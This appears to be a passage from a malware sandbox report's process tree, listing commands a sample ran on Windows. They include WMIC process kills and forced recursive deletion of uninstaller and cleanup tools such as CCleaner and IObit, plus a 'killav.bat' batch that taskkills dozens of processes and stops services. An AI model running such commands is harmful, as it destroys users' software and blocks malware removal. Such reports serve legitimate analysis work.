PID:1036

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:3008

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2384

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:976

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2824

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2508

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2996

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2180

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2868

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2936

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2856

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:1008

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:272

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:1532

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2132

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2176

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2508

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2204

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2156

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2136

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2708

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:688

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2248

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2764

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\*AUTO*Uninstaller*"
7⤵
PID:2476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\System32\*AUTO*Uninstaller*"
7⤵
PID:2516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\SysWOW64\*AUTO*Uninstaller*"
7⤵
PID:2524

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\*AUTO*Uninstaller*
7⤵
PID:2572

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\System32\*AUTO*Uninstaller*
7⤵
PID:2628

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\SysWOW64\*AUTO*Uninstaller*
7⤵
PID:2652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*AUTO*Uninstaller*"
7⤵
PID:2788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu.*"
7⤵
PID:2860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu2.*"
7⤵
PID:2832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Easy*remove*"
7⤵
PID:2884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*CCleaner*"
7⤵
PID:2920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*geek*"
7⤵
PID:2936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cad*uninstall*"
7⤵
PID:2980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*iobit*uninstall*"
7⤵
PID:3036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cadallclear*"
7⤵
PID:2996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*UninstallTool*"
7⤵
PID:1228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Dism++*"
7⤵
PID:3052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Total*Uninstal*"
7⤵
PID:2116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*AUTO*Uninstaller*"
7⤵
PID:2100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu2.*"
7⤵
PID:1948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu.*"
7⤵
PID:1784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Easy*remove*"
7⤵
PID:1560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*CCleaner*"
7⤵
PID:2136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*geek*"
7⤵
PID:2168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cad*uninstall*"
7⤵
PID:1044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*iobit*uninstall*"
7⤵
PID:2284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cadallclear*"
7⤵
PID:2224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Dism++*"
7⤵
PID:2288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Total*Uninstal*"
7⤵
PID:2432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu2.*"
7⤵
PID:2388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu.*"
7⤵
PID:1364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*AUTO*Uninstaller*"
7⤵
PID:1396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Easy*remove*"
7⤵
PID:2488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*CCleaner*"
7⤵
PID:2592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*geek*"
7⤵
PID:2544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cad*uninstall*"
7⤵
PID:2548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cadallclear*"
7⤵
PID:2436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*iobit*uninstall*"
7⤵
PID:2712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Dism++*"
7⤵
PID:2736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Total*Uninstal*"
7⤵
PID:2752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*AUTO*Uninstaller*"
7⤵
PID:2520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\msicuu2.*"
7⤵
PID:2848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*Easy*remove*"
7⤵
PID:2928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\msicuu.*"
7⤵
PID:2824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*CCleaner*"
7⤵
PID:2960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*geek*"
7⤵
PID:3024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*cad*uninstall*"
7⤵
PID:3060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*iobit*uninstall*"
7⤵
PID:3068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*cadallclear*"
7⤵
PID:2968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*Dism++*"
7⤵
PID:2820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\MSOCache\*Total*Uninstal*"
7⤵
PID:3044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*AUTO*Uninstaller*"
7⤵
PID:2756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu2.*"
7⤵
PID:2776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu.*"
7⤵
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Easy*remove*"
7⤵
PID:556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*CCleaner*"
7⤵
PID:292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cad*uninstall*"
7⤵
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*geek*"
7⤵
PID:1996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cadallclear*"
7⤵
PID:804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Dism++*"
7⤵
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*iobit*uninstall*"
7⤵
PID:2180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*AUTO*Uninstaller*"
7⤵
PID:2340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Total*Uninstal*"
7⤵
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu2.*"
7⤵
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu.*"
7⤵
PID:2612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cad*uninstall*"
7⤵
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*geek*"
7⤵
PID:2720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cadallclear*"
7⤵
PID:2664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*CCleaner*"
7⤵
PID:2496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Easy*remove*"
7⤵
PID:2608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*iobit*uninstall*"
7⤵
PID:2708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Total*Uninstal*"
7⤵
PID:2864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Dism++*"
7⤵
PID:2644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*AUTO*Uninstaller*"
7⤵
PID:2836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu2.*"
7⤵
PID:3012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu.*"
7⤵
PID:2012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Easy*remove*"
7⤵
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*CCleaner*"
7⤵
PID:3040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*geek*"
7⤵
PID:2940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cad*uninstall*"
7⤵
PID:2992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cadallclear*"
7⤵
PID:1700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*iobit*uninstall*"
7⤵
PID:2088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Total*Uninstal*"
7⤵
PID:2364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Dism++*"
7⤵
PID:2172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*AUTO*Uninstaller*"
7⤵
PID:2564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu2.*"
7⤵
PID:2704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu.*"
7⤵
PID:3048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Easy*remove*"
7⤵
PID:844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*CCleaner*"
7⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*geek*"
7⤵
PID:2912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cad*uninstall*"
7⤵
PID:2800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cadallclear*"
7⤵
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*iobit*uninstall*"
7⤵
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Dism++*"
7⤵
PID:3064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Total*Uninstal*"
7⤵
PID:988

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /B C:\\*AUTO*Uninstaller*
7⤵
PID:2724

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\$Recycle.Bin\*AUTO*Uninstaller*
7⤵
PID:2552

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Documents and Settings\*AUTO*Uninstaller*
7⤵
PID:2744

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\MSOCache\*AUTO*Uninstaller*
7⤵
PID:2188

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Program Files\*AUTO*Uninstaller*
7⤵
PID:2016

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Program Files (x86)\*AUTO*Uninstaller*
7⤵
PID:1408

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\ProgramData\*AUTO*Uninstaller*
7⤵
PID:2924

C:\Windows\system32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Users\*AUTO*Uninstaller*
7⤵
PID:1992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C killav.bat
6⤵
PID:1772

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:1464

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:688

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2456

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
PID:2664

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:2692

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
- Kills process with taskkill
PID:2000

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:2012

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:844

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:2972

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
PID:2212

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:1380

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
PID:2016

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
- Kills process with taskkill
PID:1356

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
- Kills process with taskkill
PID:2624

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:2068

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:2200

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:2732

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
PID:2508

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
- Launches sc.exe
PID:2984

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:2108

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2092

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
- Launches sc.exe
PID:2580

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:2500

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2336

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
- Launches sc.exe
PID:1356

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:2872

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:2368

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
- Launches sc.exe
PID:1660

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
PID:2260

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
- Launches sc.exe
PID:2892

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
PID:2328

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:2828

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
PID:2760

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:3028

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:2540

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2972

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:2904

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:2528

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:3000

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2624

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2380

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:2620

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:2828

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
PID:2348

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:2948

